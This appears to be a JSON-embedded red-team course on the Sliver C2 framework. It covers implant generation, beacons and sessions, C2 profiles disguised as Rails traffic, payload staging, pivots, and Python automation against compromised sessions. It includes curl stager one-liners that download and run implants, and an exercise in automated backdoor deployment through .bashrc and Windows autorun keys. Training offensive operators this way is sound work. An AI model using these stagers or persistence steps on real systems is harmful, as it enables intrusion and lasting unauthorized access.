valid values\n\nTo expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can try retrieving our implant, the ID is 19778.\n\n```asciinema\n{\"src\": \"/asciinema/implant_curl.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nSliver staging also supports encoding or encrypting our payloads before exposing them extenrally using the `profile stage` command, the implant configuration remains the same but you are now able to stage different versions of it simultaneously.\n\n```asciinema\n{\"src\": \"/asciinema/stage_compress_encrypt.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nA simple stager could look like this for example in Linux:\n\n```\ncurl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && chmod u+x nothingtoseehere &&nohup ./nothingtoseehere\n```\n\nOr on Windows:\n```\ncurl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\\t.exe\n```"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file +{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"Sliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* The file extension needs to match the c2 profile's stager_file_ext\n* There has to be a one character http url parameter\n* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values\n\nTo expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can try retrieving our implant, the ID is 19778.\n\n```asciinema\n{\"src\": \"/asciinema/implant_curl.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nSliver staging also supports encoding or encrypting our payloads before exposing them extenrally using the `profile stage` command, the implant configuration remains the same but you are now able to stage different versions of it simultaneously.\n\n```asciinema\n{\"src\": \"/asciinema/stage_compress_encrypt.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nA simple stager could look like this for example in Linux:\n\n```\ncurl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && chmod u+x nothingtoseehere &&nohup ./nothingtoseehere\n```\n\nOr on Windows:\n```\ncurl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\\t.exe\n```\n"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. 